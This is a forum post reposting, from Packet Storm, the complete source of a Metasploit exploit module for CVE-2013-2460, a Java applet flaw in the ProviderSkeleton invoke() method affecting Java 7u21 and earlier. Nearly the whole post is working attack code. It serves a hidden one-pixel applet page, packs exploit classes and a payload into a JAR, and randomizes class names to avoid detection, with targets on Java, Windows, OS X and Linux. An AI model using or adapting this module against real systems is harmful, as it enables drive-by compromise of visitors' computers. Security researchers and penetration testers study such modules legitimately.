Nytro Posted June 27, 2013 Report Posted June 27, 2013 Java Applet ProviderSkeleton Insecure Invoke MethodAuthored by Adam Gowdiak, Matthias Kaiser | Site metasploit.comThis Metasploit module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'require 'rex'class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) EXPLOIT_STRING = "Exploit" def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method', 'Description' => %q{ This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ 'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC 'Matthias Kaiser' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2460' ], [ 'OSVDB', '94346' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'], [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 18 2013' )) end def randomize_identifier_in_jar(jar, identifier) identifier_str = rand_text_alpha(identifier.length) jar.entries.each { |entry| entry.name.gsub!(identifier, identifier_str) entry.data = entry.data.gsub(identifier, identifier_str) } end def setup path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class") @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class") @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length) @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name) super end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("ExpProvider.class", @provider_class) jar.add_file("DisableSecurityManagerAction.class", @action_class) randomize_identifier_in_jar(jar, "metasploit") randomize_identifier_in_jar(jar, "payload") jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html html = %Q| <html> <body> <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet> </body> </html> | return html endendSursa: Java Applet ProviderSkeleton Insecure Invoke Method ? Packet Storm Quote